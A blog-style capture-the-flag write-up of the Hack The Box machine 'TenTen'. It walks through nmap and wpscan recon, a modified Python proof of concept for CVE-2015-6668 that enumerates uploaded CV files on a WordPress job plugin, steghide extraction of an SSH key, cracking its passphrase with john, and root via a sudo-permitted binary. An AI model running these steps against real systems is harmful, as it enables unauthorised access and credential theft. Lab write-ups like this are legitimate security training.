Hack The Box: TenTen
This is the first write up of a long series of posts from Hack The Box.
If you don’t know what Hack the box is, I highly encourage you to go the website and check it out.
Careful, this post is a straight ahead to the solution write up. I made a lot of mistake digging to a lot of rabbit holes. Please read the “Key Takeaway” section if you want to know what I tried and where I failed.
Let’s go and start.
Recon
Inspired by IppSec I’m going to start the recon phase with some nmap.
# Nmap 7.70 scan initiated Sat Aug 25 16:35:58 2018 as: nmap -sC -sV -oA box/recon/nmap/init 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.044s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
| 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelWe can see 2 ports are open, ssh and http.
I usually don’t bruteforce ssh right away, so we’ll be looking at http.
For web recon, I always like to go to the main URL to get a sense of what my next move would be.
Opening my web browser to http://10.10.10.10, I see it’s a wordpress website.
Think no more when you hear wordpress and fire up wpscan:
wpscan -u 10.10.10.10We see a lot of vulnerabilities due to the version of wordpress core.
Looking at the last updated date, nothing really shocking at first, then we scroll down to plugins and we see:
Enumerating plugins from passive detection ...
| 1 plugin found:
TName: job-manager - v7.2.5
| Latest version: 0.7.25 (up to date)
| Last updated: 2015-08-25T22:44:00.000Z
| Location: http://10.10.10.10/wp-content/plugins/job-manager/
| Readme: http://10.10.10.10/wp-content/plugins/job-manager/readme.txt
Title: Job Manager <= 0.7.25 - Insecure Direct Object Reference
Reference: https://wpvulndb.com/vulnerabilities/8167
Reference: https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668A plugin that is 2–3 years old? That sounds really good.
Let’s put aside the CVE for a second and let’s look at the website to get a sense of what that plugin does. It is going to help us going through the CVE right after.
The website appears to be some kind of Job Portal where the company would list job positions.
If we click to Job Listing, We can see we can apply for a pen-tester position.
The Apply Now link is really appealing, let’s go ahead and continue clicking.
There are a bunch of fields with personal details to fill in, but if you scroll down, the good stuff is at Upload your CV.
We can now link the role of the plugin back to what the website does. The vulnerability would be exploiting the upload feature to place our malicious php file and get remote code execution.
Let’s go back to the CVE and look more at the article.
The article says that you can “leak” uploaded CVs from the wp-content/uploads directory. In case you don’t know what that directory is, it’s there to host all the uploaded media files for wordpress.
The plugin, in fact works by creating a private post and attaching the media to the post. So I would assume that the HR person would just have to go through posts to review all the applications.
There is a problem though, the article says that you can enumerate all the applications through response codes of post ids.
Exploit:
If you check for the first post id: /?p=1 you can see it redirects to the first post
OK that’s fine because we — as an unauthorized user — can see this post.
But if you keep enumerating, you’ll find differences between non existing posts and hidden posts, like so:
There is a post which redirects to http://10.10.10.10/index.php/jobman_app/application-2/hackeraccessgranted/
Which is really kind of odd, that sounds like something we should dig into!
Continuing onto the article, the author says that the name of the file stored in the uploads directory would be where the post is redirecting to, but the difficulty is that the name might now be in lowercase, so bruteforcing might be kind of hard.
To know the filename, the plugin had another problem: the URL we went to apply earlier is this format http://10.10.10.10/index.php/jobs/apply/8/.
The ID you see, is the post-id.
If we go to http://10.10.10.10/index.php/jobs/apply/13/, we can see the page being the same… Or is it?
See the title? It has capital letters, not all lower case. The author assumes that *it is the correct filename*.
What if we would grab that file?
Let’s go ahead to the PoC and find out.
This is a relatively easy python script. It has 3 loops and the main goal is to “guess” where the file is in the uploads directly and also the extension.
I’ve made adjustments to the script in order to make it work:
import requests
print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
import sys
lines=[]
file = open("/usr/share/golismero/wordlist/fuzzdb/Discovery/PredictableRes/raft-small-extensions-lowercase.txt", "r")
for line in file:
lines.append(line[:-1])
website = "http://10.10.10.10"
filename = "HackerAccessGranted"
filename2 = filename.replace(" ", "-")
for year in range(2017,2018):
for i in range(1,12):
for line in lines:
URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + line
print "Trying: {}". format(URL)
req = requests.get(URL)
if req.status_code==200:
print "[+] URL of CV found! " + URL
sys.exit(0)In the script I use an extension word list, because I am not sure what it would be and I was pretty lazy getting all the possible media types wordpress handles. I would have been extremely more careful if it was in real situation where brute forcing would be something that could set off alarms.
The script also take into account that wordpress uploads file structure is year/month/filename.
After waiting for a little bit we have our path!
Go ahead and grab the image with simple curl:
curl http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg -OI automatically thought about hiding messages in pictures.
Googling gave me this article. Which I followed and did with empty password:
steghide extract -sf HackerAccessGranted.jpgThis gave me id_rsa. At this point I was pretty much thinking it was done.
Ssh’ing into the box as root didn’t do the trick, but I knew back from the wpscan, that we had another user takis.
So I went away and tried that. Main problem being that the private key is encrypted.
No problem: let’s john’d it:
ssh2john id_rsa > id_rsa.hashAnd good’ol rockyou
/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hashWe can the super secret password!
Let’s go ahead and ssh now as takis.
Having a shell felt good — even better when it’s from ssh — . I always do quick manual enum for “obvious” results:
sudo -lSays I can execute /bin/fuckin without password as root?
Well, not my system, so go ahead.
First sudo /bin/fuckin didn’t output anything, I was *almost* ready to reverse engineer the binary but decided to go with sudo /bin/fuckin /bin/bash.
Boom ¯\_(ツ)_/¯.
Key Takeaway
Being new at pen-testing, I truly believe that the hardest part of the job is to know where to go at all times so you don’t stay stuck too much. Do *not* follow the white rabbit.
The first “mistake” I did was to gobuster too soon. When I see webserver, I automatically start a gobuster recon. This was not necessary, some times, just going to the main URL can tell you more. In this case, my gobuster uncovered things that were not useful.
I would say, go to the website, get a sense of the stack used, then use extensions with gobuster. I also wrote a tool which does screenshot from gobuster's output, awesome for fast triage.
The second “mistake” is that I did not read the wpscan result thoroughly. I did see the plugin, but did not fully understand what it was doing right away. I preferred fuzzing the wordpress password for the takis user.
The third “mistake” is that I spent *a lot* of time understand the “upload your CV” feature. I was sure that this was it. I WANTED TO UPLOAD MY PHP FILE.
I started by trying the basics into impersonating file types to hide my php code, tried some LFI and was getting pretty desperate so I even tried fuzzing *all the extensions known to man* in order to have a list of valid extensions I could use.
Went back to wpscan, so that zip traversal directory vulnerability and thought it was it. IT WAS NOT IT.
Coming back to the plugin article, I remember I did even try to enumerate, saw that hackeraccessgranted but thought it was nothing at the time.
So I wanted to find the backdoor, I read the readme of the plugin to find a URL where I could download the source code. Did that and start reading that aweful php code.
I was at the bottom of the whole when I saw that the function that uploads the file to the directory was native to wordpress. I am not a PHP security researcher :(
Then I went back to basics, watched the first couple minutes of IppSec’s write up, and pause every second to *not* be spoiled. It hit me when he said that it was more like CTF and he was going to download an image.
I focused everything I had on getting that image and getting the PoC running. The rest took about 20 mins.
I felt bad wanting to cheat a little bit to know if I was going to the right direction. I felt pretty desperate but I felt also pretty good because I did try harder reading everything I could about injecting payload and got my fuzzy skill to the next level.
I guess writing this up made me realize that I wasn’t so bad, it was fun but I really need to be more careful about every clue I could find, don’t jump too quickly but when you are onto something act quickly.
